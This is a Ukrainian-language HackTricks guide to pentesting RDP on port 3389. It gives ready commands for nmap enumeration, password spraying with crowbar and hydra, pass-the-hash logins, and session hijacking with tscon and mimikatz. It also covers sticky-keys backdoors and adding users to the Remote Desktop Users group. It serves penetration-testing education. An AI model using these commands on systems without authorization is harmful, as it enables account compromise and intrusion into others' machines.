3389 - Pentesting RDP

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Миттєве налаштування для оцінки вразливостей та тестування на проникнення. Виконайте повний пентест з будь-якого місця за допомогою 20+ інструментів та функцій, які охоплюють реконструкцію, звітність. Ми не замінюємо пентестерів - ми розробляємо власні інструменти, модулі виявлення та експлуатації, щоб дати їм можливість краще досліджувати, виходити на оболонки та веселитися.

Основна інформація

Розроблений компанією Microsoft, Протокол віддаленого робочого столу (RDP) призначений для забезпечення графічного підключення між комп'ютерами через мережу. Для встановлення такого з'єднання користувач використовує програмне забезпечення клієнта RDP, і в той же час, віддаленому комп'ютеру потрібно працювати з програмним забезпеченням сервера RDP. Ця настройка дозволяє безшовно керувати та отримувати доступ до робочого столу віддаленого комп'ютера, фактично приводячи його інтерфейс на локальний пристрій користувача.

Порт за замовчуванням: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Перелік

Автоматичний

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

Перевіряє доступні методи шифрування та вразливість на відмову в обслуговуванні (без спричинення DoS сервісу) та отримує інформацію про NTLM Windows (версії).

Будьте обережні, ви можете заблокувати облікові записи

Password Spraying

Будьте обережні, ви можете заблокувати облікові записи

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

Підключення за відомими обліковими даними/хешем

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash

Перевірка відомих облікових даних на службах RDP

rdp_check.py з impacket дозволяє перевірити, чи є деякі облікові дані дійсними для служби RDP:

rdp_check <domain>/<name>:<password>@<IP>

Миттєве налаштування для оцінки вразливостей та тестування на проникнення. Запустіть повний пентест з будь-якого місця за допомогою 20+ інструментів та функцій, які охоплюють реконструкцію та звітність. Ми не замінюємо пентестерів - ми розробляємо власні інструменти, модулі виявлення та експлуатації, щоб дати їм можливість краще досліджувати, виконувати команди та насолоджуватися процесом.

Атаки

Крадіжка сесій

З правами СИСТЕМИ ви можете отримати доступ до будь-якої відкритої сесії RDP будь-якого користувача без необхідності знати пароль власника.

Отримати відкриті сесії:

query user

Доступ до обраної сесії

tscon <ID> /dest:<SESSIONNAME>

Тепер ви будете всередині обраної сесії RDP і вам потрібно видачіться за користувача, використовуючи лише інструменти та функції Windows.

Важливо: Коли ви отримуєте доступ до активних сеансів RDP, ви викинете користувача, який його використовував.

Ви можете отримати паролі, викинувши процес, але цей метод набагато швидший і дозволяє вам взаємодіяти з віртуальними робочими столами користувача (паролі в notepad без збереження на диск, інші сеанси RDP, відкриті на інших машинах...)

Mimikatz

Ви також можете використовувати mimikatz для цього:

ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

Sticky-keys & Utilman

Поєднуючи цю техніку з stickykeys або utilman ви зможете отримати доступ до адміністративного CMD та будь-якої сесії RDP у будь-який час

Ви можете знайти RDP, які вже мають backdoored за допомогою однієї з цих технік за посиланням: https://github.com/linuz/Sticky-Keys-Slayer

RDP Process Injection

Якщо хтось з іншого домену або з кращими привілеями увійшов через RDP на ПК, де ви є адміністратором, ви можете впровадити свій сигнал у його процес сесії RDP та діяти від його імені:

pageRDP Sessions Abuse

Додавання користувача до групи RDP

net localgroup "Remote Desktop Users" UserLoginName /add

Автоматичні Інструменти

AutoRDPwn - це фреймворк післяексплуатації, створений на Powershell, призначений в основному для автоматизації атаки Shadow на комп'ютери під управлінням Microsoft Windows. Ця вразливість (вказана як функція Microsoft) дозволяє віддаленому зловмиснику переглядати робочий стіл своєї жертви без його згоди, а навіть керувати ним за потреби, використовуючи інструменти, властиві самій операційній системі.

  • Керування мишею та клавіатурою автоматичним чином з командного рядка

  • Керування буфером обміну автоматичним чином з командного рядка

  • Створення SOCKS-проксі від клієнта, який направляє мережеве спілкування до цілі через RDP

  • Виконання довільних команд оболонки та PowerShell на цілі без завантаження файлів

  • Завантаження та вивантаження файлів з/на ціль навіть тоді, коли передача файлів вимкнена на цілі

Автоматичні Команди HackTricks

Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.

https://book.hacktricks.xyz/pentesting/pentesting-rdp

Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}

Миттєве налаштування для оцінки вразливостей та тестування на проникнення. Запустіть повний пентест з будь-якого місця за допомогою 20+ інструментів та функцій, які охоплюють реконструкцію та звітність. Ми не замінюємо пентестерів - ми розробляємо власні інструменти, модулі виявлення та експлуатації, щоб дати їм можливість краще досліджувати, виконувати команди та насолоджуватися.

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Last updated